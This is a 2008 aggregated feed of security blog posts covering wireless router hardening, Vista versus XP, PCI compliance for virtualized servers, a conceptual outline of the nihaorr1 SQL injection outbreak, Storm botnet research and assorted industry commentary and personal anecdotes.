Wednesday, April 30, 2008

Spliced feed for Security Bloggers Network

Spliced feed for Security Bloggers Network

Wireless modem considerations [Malta Info Security]

Posted: 30 Apr 2008 10:11 AM CDT


I am pretty sure that there are a number of you out there reading this blog over a wireless network. Given that wireless is so widely distributed these days, its not uncommon that users are unaware of how insecure their wireless setup maybe.

Unfortunately one other reality is that a number of ISP's install wireless modems without setting up any sort of security. What's worse is that if the client doesn't speak up - they don't quite advise the customer of what could be at risk. Basically as long as your laptop/device successfully connects to the wireless LAN that is setup up for you, they're out of there. SOO - this is where we come in to offer some advice.

If you connect to your wireless router without a password, its time to get hold of a technician who knows his business and set up some security on it. That's not all...

Recent developments published by Petko D. Petkov reveal some pretty nasty things an attacker can do to Thomson Speedtouch wireless modems - which is what a lot of us Maltese people have at home to connect to the internet.

Thanks to a friend of mine who first pointed out the article above, it is now possible that if an attacker sees your default network name (SSID) then it would be possible for him to crack your default password and use your internet connection. Therefore here are some healthy tips you could pass onto your technician if you're not confident to set them yourself.

Use WPA2 encryption rather than WEP/WPA.

Note that this will affect usage of early PDA's wireless and even computers with Windows XP. In fact you will need to download a patch for Windows XP to use WPA2. Also certain old wireless adapters (802.11b) might not have updated drivers, so do your homework to see if your adapter can use WPA2 before you start changing anything.


Change the default network name (SSID)

Change the default name of your router to something else. Invent an name.


Change the default password (preshared key)

If you don't have a password - PUT ONE. If the router is using a default password, its a good idea to change it unless you don't mind sharing your internet conenction with your neighbours.


Continue reading " Wireless modem considerations"

It’s ironic ! It seems only Microsoft in the world likes to migrate to Vista [Telecom,Security & P2P]

Posted: 30 Apr 2008 05:03 AM CDT

ZDnet reports that HP, Lenovo join Dell in extending Windows XP. It’s very ironic! It’s also interesting. Why MicroSoft just want to upgrade to a software that most customers and partners dislike or even hate? Meanwhile, why a brandnew OS that Microsoft spent billions of dollars to develop doesn’t get any acceptance by the users?

This is not just because of the higher hardware resources needed by Vista. Today, 1GB memory only cost less than 20$. It’s very cheap. The real reason is that the users can not find a reason for them to upgrade. They just can not convince themselves and the board.

A few days ago, Microsoft released Windows XP SP3 and Vista SP1. From the web reports, the performance of Vista SP1 doesn’t get improved, while XP SP3 is more satisfying to most of users. That’s the point.

The below is the report by ZDNet.

Rumors of Windows XP's demise have been greatly exaggerated.
I wrote about Dell's downgrade program in a post earlier this week (Windows Vista just can't catch a break). It looks like Dell may have started something. Both HP and Lenovo now plan to offer Windows XP to business customers after Microsoft's official cut-off date of June 30.
Lenovo will provide a Windows XP recovery disc with systems so that users can downgrade from Windows Vista until January 31, 2009, according to Information Week. The downgrade program covers laptops and desktops with Vista Business or Ultimate.
HP said it will offer Windows XP to business customers for an unspecified time beyond June 30.
Dell's program covers OptiPlex desktops and laptops, Latitude laptops, and Precision workstations. Those systems come with Windows XP pre-installed but include a copy of Vista Business or Ultimate so customers can upgrade when they are ready. The Vostro desktops and laptops for small and medium-size businesses, and some XPS gaming systems, will also continue to offer the downgrade service for a fee.
Though it has been widely reported that the Dell downgrade option would be good through 2010, (when Microsoft is set to release Windows 7) Dell now says the program will last as long as "Microsoft supports it," according to Information Week.
This comes after CEO Steve Ballmer suggested earlier this week that Microsoft might change its mind and extend Windows XP if customers asked for it. But he said the majority of new systems ship with Vista, and so far they haven't seen customers asking for Windows XP.
Not everyone is convinced. Microsoft reported quarterly earnings on Thursday and revenues in the client division fell a little short, which The New York Times' Steve Lohr writes could be a sign the company has a problem with Vista. Meanwhile InfoWorld Editor-in-Chief Eric Knorr has collected more than 160,000 signatures for his Save Windows XP petition (complete with countdown clock).
Microsoft has already announced that Windows XP will continue to be available specifically for ultra low-cost systems that do not meet the system requirements for Vista.
John Morris is a former executive editor at CNET Networks and senior editor at PC Magazine. See his full profile and disclosure of his industry affiliations.

ShareThis

All Your Virtualized PCI Compliance Are Belong To Us... [Rational Survivability]

Posted: 30 Apr 2008 12:13 AM CDT

Rubberglove Another interesting example I use in my VirtSec presentations when discussing the challenges of what I describe as Phase 2 of virtualization -- virtualizing critical applications and things like Internet-facing infrastructure in DMZ's -- is the notion of compliance failures based on existing and upcoming revisions to regulatory requirements.

Specifically, I use PCI/DSS to illustrate that in many cases were one to take a highly-segmented and stratified "defense-in-depth" architecture that is today "PCI compliant" and virtualize it given presently available options, you'd likely find yourself out of compliance given the current state of technology solutions and auditing standards used to assess against.

Then again, you might just pass with flying colors while being totally insecure.

Here's a fantastic example from Eric Siebert over at the TechTarget Virtualization blog.  Check this out, it's a doozie!

Having just survived another annual PCI compliance audit, I was again surprised that the strict standards for securing servers that must be followed contain nothing specific concerning virtual hosts and networks. Our auditor focused on guest virtual machines (VMs), ensuring they had up-to-date patches, locked-down security settings and current anti-virus definitions. But ironically, the host server that the virtual machines were running on went completely ignored. If the host server was compromised, it wouldn't matter how secure the VMs were because they could be easily accessed. Host servers should always be securely locked down to protect the VMs which are running on them.

It seems that much of the IT industry has yet to react to the virtualization trend, having been slow in changing procedures to adjust to some of the unconventional concepts that virtualization introduces. When I told our auditor that the servers were virtual, the only thing he wanted to see was some documentation stating that the remote console sessions to the VMs were secure. It's probably just a matter of time before specific requirements for virtual servers are introduced. In fact, a recent webinar takes up this issue of whether or not virtualized servers can be considered compliant, addressing section 2.2.1 of the PCI DSS which states, "Implement only one primary function per server"; that is to say, web servers, database servers and DNS should be implemented on separate servers. Virtual servers typically have many functions running on a single physical server, which would make them noncompliant.

So let's assume that what Eric talks about in section 2.2.1 of PCI/DSS holds true, that basically means two things: (1) PCI/DSS intimates that virtualization cannot provide the same level of security as non-virtualized infrastructure and (2) you won't be able to virtualize infrastructure governed by PCI/DSS if you expect to be compliant.

Now, this goes toward the stuff Mogull and I were talking about in terms of assessing risk and using the notion of "zone defense" for asset segmentation in virtualized infrastructure. 

Here's a snippet from my VirtSec preso on the point:

Riskdrivensegmentation_3 Further, as I mentioned in my post titled "Risky Business -- The Next Audit Cycle: Bellweather Test for Critical Production Virtualized Infrastructure," this next audit cycle is going to be interesting for many companies...

Yippeee!

/Hoff

Check Point Admin Rot [BumpInTheWire.com]

Posted: 29 Apr 2008 11:02 PM CDT

My brain is fried.  The first two days of this week have been brutal.  It started out wonderfully yesterday morning when the SSL certificate for our Check Point SmartCenter console expired over the weekend.  I’ve spent a good chunk of both days dealing with that.  The management server is an old Windows 2000 Server box that has been upgraded from NG to NG R55 to NGX R60.  Now its a paper weight.  TB threw out maybe it was a result of “Windows rot” and I think its a result of “Check Point Admin rot.”  I’m not afraid to admit that my knowledge of exactly how Check Points interworkings go together is not that good.  I’m learning though!  School of hard knocks.

Speaking of something else I’m not that knowledgable about is QoS.  But that too I am learning…from that same school too!  The school of hard knocks.  A local Cisco SE was out today to go over a few things regarding our infrastructure and I ran something by her regarding QoS.  That was a mistake for my current mental capacity.  She might as well have been speaking Portuguese to me.  I had to jump off the Check Point train and jump on the QoS train.  The University of Google is a much easier school than that hard knocks university!  So the brain smokes while I sit in a chair yearning for a life less complicated.  Feel sorry for me?  Didn’t think so.  I wouldn’t either.

Clouding the Issue: Separating "Securing Virtualization" from "Virtualizing Security" [Rational Survivability]

Posted: 29 Apr 2008 10:09 PM CDT

My goal in the next couple of posts is to paint some little vignettes highlighting some of the more interesting points I raise in my presentation series "Virtualization: Floor Wax, Dessert Topping and the End Of Information Security As We Know It."

The first issue up for discussion is the need to recognize and separate two concerns which are unfortunately most often intertwined when companies are considering virtualization and its impact to their IT operations and security programs. 

My goal here is not to try and explain away every nuance of this slide or push a conclusion on anybody, but instead plant the seeds and set the premise for discussion's sake.

SeparateissuesThe slide to the left sums up the point reasonably well, but here's the associated scaled-down narrative that accompanies this slide:

Companies need to approach addressing each of these issues by assessing the risk associated with each separately and then juxtaposed.

Treating them as a single concern -- as most do -- leads to an unfortunate series of chicken-egg debates that usually do not address the things that really matter in the first place.

The point here is that while these concerns are very much related and both important, the order in which they are addressed is often critical.

Specifically, one can take an incredibly secure solution and yet still manage to deploy it in an incredibly insecure manner.  Even if the virtualization platform one chooses is (by some mythical standard) impervious to compromise (*cough*,) given specific configuration constraints, deviations from those constraints can lead to exposure.

If the manner in which virtualization platforms are configured, managed, monitored and secured after you've already deployed them are not consistent with the rigor and diligence we've applied to our non-virtualized infrastructure (and by observation they are not,) worrying about how secure or insecure your VMM platforms are is a waste of synaptic processes.

My experience has shown that most organizations have simply plowed ahead and accepted or ignored the risk associated with deploying virtualization platforms, accepting on blind faith the claims of virtualization vendors and assuming that the VMM providing the abstraction layer between hardware and software is at least as secure (if not more so) as a non-virtualized installation of the operating system.

This is usually done because the economic benefits of virtualization which are absolutely quantifiable far outweigh the perceived risks associated with virtualization which are not (or are at least difficult to produce.)

I'm unsure how exactly most companies are assessing risk against their virtualized environments formally since many of them admit to not having a risk assessment methodology in place to do so.

It would seem that most folks simply look at the known vulnerabilities associated with a vendor's VMM and the current threatscape and make a swag as to the resultant residual risk given any compensating controls that might be in place.  In many cases, however, the "risk" we're debating is based upon threats and vulnerabilities that may not even exist, so we're academically making judgment calls based on possibility versus probability.

Yikes.

How many times have you entered into debate with *someone* in IT, security, audit or the business arguing about "securing virtualization" after someone's seen a "Blue Pill" presentation when in all honestly the company has already deployed hundreds of VM's and still hasn't segmented the network or built a risk assessment framework to quantify the business impact?

See what I mean?

/Hoff

Off Topic: Southwest Airlines Monitoring Twitter For Customer Service/Brand Protection [Rational Survivability]

Posted: 29 Apr 2008 08:58 PM CDT

Customerservice Planes, Trains and Automobiles

My Southwest Airlines flight from New Hampshire to Philly yesterday sucked the big one.  Flying into Philly is always a gamble but yesterday I went all in and flew SWA for the first time instead of US Scareways.

My flight was supposed to take off at 5:20 PM.  It actually took off at around 7:45 PM.  Due to "weather," once we arrived over PHL airspace, those of us in the bovine express class then endured 30 minutes of low-earth orbit in a holding pattern awaiting vector approach clearance to land once we got there.

Upon landing, we waited almost 30 minutes for our luggage only to find that they had to go back for a second load since the first wasn't large enough of a sweep to claim them all.  The baggage came...and went.  Mine wasn't amongst them.  It was now 10:30pm.  At this point, one of my VP's who was also traveling to the same locale wisely left.  Cue the violins.

I filed a claim next to a woman who was going apeshit over her drenched and soiled suitcases.  The migrant baggage helper person said that another flight was due in shortly (about 45 minutes) and I could wait to see if it was on that flight.  I made some remark about pitching a pup tent in baggage claim.  I could hear crickets chirping...

This was all friendly and helpful enough.  There was no reason to get medieval as the poor souls behind the counter can't even track bags to tell if they landed -- or so they say.  Upon filing my claim, I asked that my bag just be returned to NH or delivered to my hotel given the fact that I was staying only one night before returning home.  They would try the latter as the last run to "local" hotels was around midnight.

I was prepared for the old fake-finger-teeth-brushing and washcloth-the-armpits routine to get me through my meeting if need be.  Wow.

It was now almost 11pm.  I still had to collect my rental car and drive 45 minutes to my hotel.

As I was walking out, I saw a strange man return my bag to the carousel. I reckoned that if he took it, loaded it with explosives and put it back, that hopefully I would suffer a quick death.  No such luck.

I picked it up and wrung it out.  It was soaked.

I shrugged it off, got the rental and got to my hotel in one piece.

Corporate accounts payable, Nina speaking. Just a moment...

Of course I twittered the entire experience with my normal (lack of) withholding.  I didn't address the tweet to @southwestair or anything, but I obviously mentioned them by name.

This morning I was quite amazed to see that someone (not something) from Southwest was monitoring Twitter feeds and responded to me.  I can tell it isn't a bot because of the responses to the rather colloquial nature of some of my tweets.  Check it out:

Swatwitter

The plea to let them try again to earn my loyalty and prove that "Southwest=Awesomeness" came from a statement that "Southwest=Suckage."  ;)

It's pretty interesting that they have people monitoring Twitter for brand/reputation purposes -- it comes across as a customer service effort, also.   I know it's not as profound as some of the remarkable Twitter stories of late, but it was cool.

Cool and frightening at the same time.  So, thanks for the attention, SWA.  We'll see how you do on my return flight today.

Anyone else have an experience such as this?

/Hoff

Update: The flight back was great.  It arrived early, to boot.  I have to say that my Southwest Twitter experience wasn't just a single fire and forget incident as "they" twittered back again to check up on me:

Swatwitter2

;)

From the Interop 2008 show floor [Napera Networks]

Posted: 29 Apr 2008 08:57 PM CDT

It may not be the halcyon days of the late 90’s when Interop took over the massive Las Vegas Convention Center, but judging from the mood at today’s show the buzz is definitely back at Interop!

NAC is everywhere, and Mike Fratto’s sneak peek of the Information Week Third Annual NAC survey confirms what you can tell by just walking around the show floor - there is a huge amount of interest from customers in NAC solutions, and we’ve had lots of interesting meetings today.

Speaking of Information Week, Andrew Conroy-Murray just published a great profile on Napera, and I recorded a brief video interview with Andrew for TechWeb that should be published shortly. Hopefully you’ll be able to hear us over the Frank Sinatra and Barbra Streisand impersonators crooning in the next booth!

I’m speaking Wednesday at 1pm in the Microsoft booth (1719, right near the main exhibit floor entrance). I can’t croon like Ole Blue Eyes, but stop by and say hello if you have a moment.

Todd, Robin and Cary in a rare serious moment.

EDUCAUSE/Internet2 Security Professionals Conference [Kees Leune]

Posted: 29 Apr 2008 07:41 PM CDT

For those of us in higher education; do not forget that the EDUCAUSE/Internet2 Security Professionals Conference will take place starting this Sunday (May 3). If anyone is going there and would like to meet up, please drop me a note! I'll be getting in Saturday evening around 8pm or so.

Enough About Estonia [RSA Conference - Blog]

Posted: 29 Apr 2008 07:00 PM CDT

PCI App Security, Kraken Hackback Ethical Dilemma, and MS Forensics [The Falcon's View]

Posted: 29 Apr 2008 06:21 PM CDT

I realize that I've been a bit light on infosec subjects lately, so thought that I'd better get back on topic. :) There are three bits out today that I've found particularly interesting. First, more information has been released by...

Blue Box #78: Cisco IP phone vulnerabilties, WiFi handset insecurity, IETF security-related news, VoIP security news, listener comments and more [Blue Box: The VoIP Security Podcast]

Posted: 29 Apr 2008 01:57 PM CDT

Synopsis:  Blue Box #78: Cisco IP phone vulnerabilties, WiFi handset insecurity, IETF security-related news, VoIP security news, listener comments and more


Welcome to Blue Box: The VoIP Security Podcast #78, a 40-minute podcast  from Dan York and Jonathan Zar covering VoIP security news, comments and opinions.   

Download the show here (MP3, 17MB) or subscribe to the RSS feed to download the show automatically. 

NOTE: This show was originally recorded on February 25, 2008. Yes, that was two months ago... we know!

You may also listen to this podcast right now:

Show Content:

Comments, suggestions and feedback are welcome either as replies to this post  or via e-mail to blueboxpodcast@gmail.com.  Audio comments sent as attached MP3 files are definitely welcome and will be played in future shows.  You may also call the listener comment line at either +1-415-830-5439 or via SIP to 'bluebox@voipuser.org' to leave a comment there. 

Thank you for listening and please do let us know what you think of the show.

This posting includes an audio/video/photo media file: Download Now

nihaorr1 attack explained [IT Security: The view from here]

Posted: 29 Apr 2008 11:23 AM CDT

I went and introduced myself to the guys at Secerno again at InfoSec last week, and whilst I have no professional affiliation with them, I'm always interested in exciting technology which does something new. Steve Moyle, CTO, is a friendly guy who oozes enthusiasm, just as Paul Galvas was when I met him last year. I just got a mail from Steve to tell me about a recent attack, and I thought it was so well explained I offered to reproduce it here. Steve agreed, so here goes:

"The nihaorr1 attack trashed web facing databases all over the planet last week. It was based on an automated SQL Injection attack (Secerno stops these). Previous attacks like this were targeted and individual. It was only a matter of time before someone sinister worked out how to automate it. We were working with a victim not long after the outbreak.

In this attack, they were not stealing data. However, for the affected web sites it would be difficult for anyone claiming PCI compliance that they had their data under control. The attack can easily be rewritten to take integer values (e.g. credit card numbers) from one field (say) and copy them to a text field, and then expose them on web pages ...

Basically, the attack worked as follows:

Step 1: potentially vulnerable sites identified automatically (probably by a Google query)

Step 2: SQL Injection part 1. SQL injection at a site to ask the database for every field it has that contains text

Step 3: SQL Injection part 2. Update every text item in the database with the original item plus a link that will download a trojan to the web browser

Now what happens is that when a web site serves up a page, the text it serves up is called up from its database -- but every piece of text now has a malicious link under it. When clicked on, the link serves up a virus that infects the viewer of the web page.

Note that the original victim -- the web site -- has become the attacker. Whilst the new victim is the website visitor who trusts the site.

This attack will be adapted and will cause real chaos."

Thanks Steve for the entertaining story and explanation of how this attack is working. And, as the Romans say, caveat emptor internettus.

"The Kite Runner" will change how you think about Afghanistan [StillSecure, After All These Years]

Posted: 29 Apr 2008 11:16 AM CDT

My wife Bonnie and I don't get out to the movies as much as we used to. When we do it is often with the kids, so we miss out on many of the adult (no, I don't mean those kind of adult) themed movies that come out. We wait for the DVD, but even than I miss many. I compensate by watching movies on planes a lot. Recently I caught The Kingdom with Jaime Fox and We Own the Night with Marc Wahlberg and Joaquin Phoenix. Both good, powerful movies. However, last night on my way out to Vegas for Interop I watched a movie that will change my life. It is the Kite Runner, based on the book of the same title by Khaled Hosseini.

The movie tells the story of two boys growing up in pre-Soviet invasion Kabul, Afghanistan all the way up to the year 2000, with a pre-9/11 Taliban regime in charge. You can read the Wikipedia article I linked to or better yet go rent the movie or read the book (I am going to read it next) for all of the dramatic details. However, let me talk a bit about my take away from this film. First of all, like many Americans I had a pre-concieved notion of Afghanistan as a poor, backwater, backwards place that welcomed a repressive regime like the Taliban to power and were part of the Muslim world that runs from the Med through to Pakistan. Nothing distinctive and in fact lets face it, I am not sure we humanize the people who live in that part of the world, as we do Europeans or our fellow Americans. I knew little to nothing of Afghan history or lifestyle. Our American view of the world makes it hard for us to remember that children are children the world over and their lives are special. Whether it be something as simple as flying a kite or aspiring to be a writer, all children share the same dreams, hopes and challenges. Yes, in a place like Afghanistan with its ethnic tensions, there is room for a level of violence we don't often see here (but even that is BS, me living in Boca doesn't see it, but live in an inner city bad neighborhood in the US and is life any better for a child?). But parents are parents the world over and they love their children and have hopes for their children the same way you and I do. People have values they believe in and may not be the most religous, but are never the less good people.

The movie made me think about my role as a father, husband and American. The whole American immigration experience is such a great influence on the world. We have the ability to take people from anywhere and they become Americans. The father in the movie goes from being a man of power and wealth in Kabul, to working in a gas station here. The father-in-law was a general in Afghanistan, but just a lower middle class worker here. But they don't lose their identity or the pride and sense of who they are and most of all their values. They don't lose their identity into the melting pot, but we add their identities to our tapestry of life here in this country. That is the real special sauce in what makes America

That part of the world is not just full of religous extremists. There are real live human beings there who think and feel very much like we do. Yes there are incredible challenges with religous extremism to overcome, but there is a core of real people who are worthy of our efforts. At the end of the day, that is what the movie has succeeded in doing for me. It has made the Afghan people real.

Hacking back: Storm Botnet [Birchtree Blog]

Posted: 29 Apr 2008 11:08 AM CDT

Well there are some ways to counter hackers, Researchers from Mannheim, germany, used one of them: hacking back.

They are running an attack on the botnet 'Storm'.

"The researchers, from the University of Mannheim and the Institut Eurecom, recently infiltrated Storm to test out a method they came up with of analyzing and disrupting P2P botnets. Their technique is a spinoff of traditional botnet tracking, but with a twist: it not only entails capturing bot binaries and infiltrating the P2P network, but it also exploits weaknesses in the botnet's P2P protocol to inject "polluted" content into the botnet to disrupt communication among the bots, as well as to study them more closely."

Botnets in general are used to generate a net of connected "hacked" computers that will execute tasks for their 'masters'. In general they are used to send e-mail spam. The users of these computers are usually unaware of this abuse of their machines.

via Researchers Infiltrate and 'Pollute' Storm Botnet - Desktop Security News Analysis - Dark Reading

New Blue Box shows coming soon... [Blue Box: The VoIP Security Podcast]

Posted: 29 Apr 2008 09:44 AM CDT

My apologies for the long delay... we haven't "podfaded". We have several main shows recorded that I'm hoping to get out this week and I've got a host of volunteers ready to help with getting some of our backlog of "Special Edition" shows out... I just have to put the pieces in place so that those volunteers can help! Unfortunately, the process of buying a new home and selling our existing home has severely hit my available time and that's the primary reason for the delays. Within the next month or so that should hopefully all wind down and I can resume the regular activity....

Thanks for your patience!

The road ahead [IT Security: The view from here]

Posted: 29 Apr 2008 07:10 AM CDT

With user security, CIA (or AAA as it becomes) is fully integrated. This is an area of security which has been around since computers were first invented, to some degree. It is the most mature of the 3 areas I have picked out in my series of posts so far. [Although please note, these are only picked out for sake of ease, in reality there are overlaps.] Network security is less integrated, although in my career I have watched as point solutions in the network have become more fully integrated. Network devices at least all talk the same language to each other now, TCP/IP as a standard form of communication has kind of settled in.

With data we are not quite so fortunate, C, I and A are not integrated, although large storage companies are trying. There are a few of these though, so they all have their own standards.

In my original piece I said that integrity was the future of data security, and indeed, it will be an important part of every piece of storage eventually, when everyone realises its importance - but that's not a great starting position. I don't think it will be a point solution that becomes part of a data security standard. Integrity will always be an option, along with encryption and compression as the whole data centric security space merges and evolves.

This will happen separately from hardware as well as being built in to it. But will the standards emerge from the hardware, or something distinct and separate from the hardware that the information resides on?

Data-centric security has to be able to move with the data. Anything that the large storage companies try to apply directly into hardware will be difficult to use at best, more likely ignored. We've already seen a big pull and push between Sun, IBM, etc. in trying to standardise key management. If they can't even agree on that, where keys are already in reasonably standard formats, what chance do they have on agreeing on compression, encryption and integrity standards? It is more likely they will pick up and use existing popular methods over time as happened in the network.

I don't want this to become too much of an advert, but I spoke recently about PKWare, because I am interested in them, and will be visiting them this week. I'm going to talk with them about their products in more detail, but they sound very close to my heart, and as close to the reality of reaching my data security nirvana that I've actually seen. What's more, it makes sense.

I've heard some very interesting things about them recently, their new SecureZIP line, and PartnerLink are both areas I identified as being massive opportunities for growth whilst at my previous job. I actually asked our engineers about designing a product almost identical to PartnerLink, but it was too much for our small team. We didn't have the resources to develop the ideas, but now I find those ideas already exist.

Ask anyone (as I did at InfoSec) whether they've heard of PKWare and they will often look blank, until you say "have you ever used PKZIP?", which of course everyone has at some point, if they've used a computer for anything other than emails. I'll be asking some more searching questions this week and reporting back in due course.

Intentional Security Blindness [BlogInfoSec.com]

Posted: 29 Apr 2008 06:00 AM CDT

In previous columns I talked about two types of employees, contractors, and the like who could cause your organization harm through poor security practices resulting in loss of data, money, or trade secrets, etc. The first type were people who caused such losses inadvertently through security policy violations such as taking unencrypted medical records home on a lap top or memory stick and losing it. The second type was someone who intentionally stole such valuable data or caused a denial of service which in both cases had potentially significant cost to your company in terms money, lost business, or management time lost to litigation. But there is a third type individual who could cause these undesirable losses to your company and they are almost always employees.

Who are they?

So who are these people? Generally, they are the most powerful or influential people in your company who often are higher up in the corporate hierarchy than the security department. They could be the CEO, the CFO, the head of marketing, or the powerful heads of profit centers. So what do they do and why do they do it?

What do they do?

First, the what. They demand new or modified applications that open up serious security flaws, either by web enabling legacy applications that were never designed with security in mind beyond authenticating a user which is, of course, anyone with a web browser. A very good example of this has occurred in the electric power industry whose systems are controlled by a technology called SCDADA (System Control and Data Acquisition). SCADA was intended for use in closed company system and so has little built in security. However, over time, SCADA systems have been opened to the internet which poses a significant threat to the nation's grid systems. Alternatively, they may demand new applications such as Web 2.0 Mash-ups, or Voice Over IP (VOIP) to name a couple. These applications are inherently insecure as any review of the security literature will reveal. Not only are they insecure, but they are exceedingly difficult to provide with an acceptable degree of security. Now, if the security department is performing its role, the people demanding these applications would be aware of the security issues. But in many cases, the security people are not high up enough in the organization to be heard, or even if they are, there message is ignored.

Why do they do it?

Now the Why. In a word – money. These new applications are seen as increasing revenue or reducing operating costs by opening up applications to the web. In addition, they may be seen to enable the business to become more nimble. Finally, they may be needed because the competition has such applications or the customers are demanding them. Because of the perceived financial gain, the executives will turn a blind eye to the security implications of these applications, or simply say "You're the security department, fix it."

What do we do?

So in the end, the security people try to make the best of it by finding security solutions that address the most serious of the security exposures and simply accept the rest. So how do we reduce "Security Blindness?" The best way is to achieve a position in the organization where the executive requesting these applications has to accept the residual risk (in writing) rather than the security group.


Copyright © 2008 BlogInfoSec.com. This feed is copyrighted by bloginfosec.com. The feed may be syndicated only with our permission. If you feel that this feed is being syndicated by a website other than through us or one of our partners, please contact bloginfosec.com immediately at copyright()bloginfosec.com. Thank you! Again, please contact copyright@bloginfosec.com so we can take legal action immediately.

1st Pacific Rim Regional Collegiate Cyber Defense Competition [Napera Networks]

Posted: 28 Apr 2008 08:30 PM CDT

Napera was proud to be a sponsor of the 1st Pacific Rim Regional Collegiate Cyber Defense Competition held this weekend at the Microsoft campus. For ChrisB and I, it was a rare opportunity to see students in action in a highly technical scenario, and we were both impressed by the levels of skill on display as they defended their network from the Red Team. Special props go to the team from the University of Washington Computer Science & Engineering for taking the top score.

I’m sure everyone who participated is already on their way to a promising career in information security. As I mentioned to several people at the event, Napera has intern and full time positions open and we welcome inquiries at careers@napera.com.

All eyes were on screens as the competition started Saturday morning.

My opinion of John Thompson [An Information Security Place]

Posted: 28 Apr 2008 04:16 PM CDT

John Thompson is an ass.  There, I said it.  Whew…

So now, let me ’splain.   I did not really have an opinion of John Thompson until the 2005 RSA Conference (except for the acquisition of Veritas - it made sense to me, but it royally screwed me over at a critical time - explained below).  I just thought of him as another CEO of a pretty successful security company.  Either he had not done enough to stand out to me, or I simply had not paid attention to him up to that point.  Anyway, I was sitting in the audience at RSA 2005, and I had just finished listening to Bill Gates talking about their entry into security.  Like many people, I met this with apprehension and doubt, but I still listened with respect.  But then Mr. Thompson came up after Bill was done, and that respect factor went right out the window (for Mr. Thompson, that is).  He proceeded to rip Bill Gates up one side and down the other, and it was the single most rude and disrespectful display I have ever seen.

Now don’t get me wrong.  I am not a MSFT fanboy.  I have slammed them on many an occasion.  But what Mr. Thompson did was really beyond just trying to head off a competitor.  It was unprofessional, and it smacked of school-yard bully tactics.  And to add to it, Mr. Thompson had a crew waiting at the doors handing out review forms to see what the audience thought of his little speech.  I gave it negatives across the board, handed it back with a sneer, and then slapped the person who handed it to me (OK, that last part about smacking them was made up… but I DID sneer).

Now he is being downright condescending towards McAfee.  When asked how he felt about them since they are viewed as Symantec’s chief competitor, he said:

It’s a nice little company and they do a nice job. The industry needs competition. But we don’t see their portfolio as competing directly with ours. We help customers manage their infrastructures better.

Dude, come on.  Please get off your friggin’ crystal tower.  You can debate your quality versus their quality if you want, but pitiful statements like that are beyond ridiculousness.  Confidence is needed in a CEO.  Arrogance just looks petty.  Eric Hoffer said, "“Rudeness is the weak man’s imitation of strength."  You are looking pretty weak, Mr. Thompson. 

BTW, I am not a McAfee fanboy either.  But Mr. Thompson, I have run and managed both your AV products and McAfee AV products in ENTERPRISE settings.  McAfee has ALWAYS beat yours, hands down.  And that is in management, performance, and accuracy.  That is my experience.  And while I have limited experience in some of your other products, I can say that from the outside, your product line looks like a mismash of crap. 

And your acquisition of Veritas way back when?  I was actually one of the few people who thought that acquisition made sense.  But that also hosed me in so many ways.  Like when I was trying to perform my DR test in Arizona.  I’m a big boy, so I take responsibility for that kind of failure.   But horrible support from Veritas / Symnatec single-handedly screwed up my DR test.  Support was already bad at Veritas, and you jacked it up even worse.  Great job.

So there’s my rant.  I hope I don’t get sued for libel. :)  BTW, it looks like someone else out there feels the same way I do about Mr. Thompson (though they said it in a nicer way).

Vet

Not enough blogging (or: where to find me) [Episteme: Belief. Knowledge. Wisdom]

Posted: 28 Apr 2008 11:52 AM CDT

I get a hard time for not enough blogging around here. But lately, I’ve been doing much more of my blogging over on my employer’s new blog: The Neohapsis Labs blog. All of the fun stuff in my head that revolves around information security and risk management has been going over there.

I’m especially jazzed by my newest post: Risk and Understanding all of the Variables. I’ve been annoyed of late about the financial newscasters oversimplifying the state of the economy through their use of the Dow Jones, and I finally sat down and did the analysis that I knew would show how misguided that view of risk management is.

Please check it out - it’s a fun one.

[Slashdot] [Digg] [Reddit] [del.icio.us] [Facebook] [Technorati] [Google] [StumbleUpon]

Technorati Tags: , , ,

Nearly there... [IT Security: The view from here]

Posted: 28 Apr 2008 11:30 AM CDT

I've just finished writing my final post in the series of 'data nirvana' posts - you can read it here tomorrow - and taken a quick look back through the other blogs I enjoy to find Rich talking about data classification being dead. I have to agree. I started writing about this last year and even ranted at someone else about not understanding it properly (which I won't dig up again).

Data classification is the real data nirvana of course, but it really can't be achieved satisfactorily. To echo Mr. Mogull for a moment, a network is a dynamic thing, it's constantly being updated with information, which can change its status from Top Secret to Private, or Public to Classified in a stroke. Tags just don't cut it. A company I spoke to at length last year propose a data classification solution. They haven't pushed it as such yet because the market isn't there. A few tyre kickers have had a go, not because they want to classify their data, but because they want to find it. That's a totally different matter. De-duplication is a very good idea, and simple, and sellable. Data classification is a great idea, but complex and completely un-sellable to anyone except me and Rich. [If you manage to invent it, please drop us a line.]

The only way you could manage to classify a system is to close it: make it read-only, or take it off-line as Rich also talks about. That kind of makes technology about as useful as your local library, though, and sends us crashing back into the 20th century just as everyone is getting used to the 21st. Something I find much more interesting is the idea of controlling information from a central hub, with policies in place around it - information sharing. It's more of a 'real world' example of how people are likely to use data security.

It reduces the need for classification as you only have to choose policies around the data you are making available outside your network. I also talked about this last year, as Microsoft released their SISA idea with about 10 other companies involved. This is clearly a good idea, but with so many technologies involved, bound for disaster. I don't know if anyone got anywhere close to deploying this, but I rather think not.

So Information Sharing is my new proxy-nirvana, or pseudo-nirvana, that is, the thing that will sell and be used, and is actually practical and possible. And guess what, I just happen to have written something about it in my post tomorrow... read on.

No comments: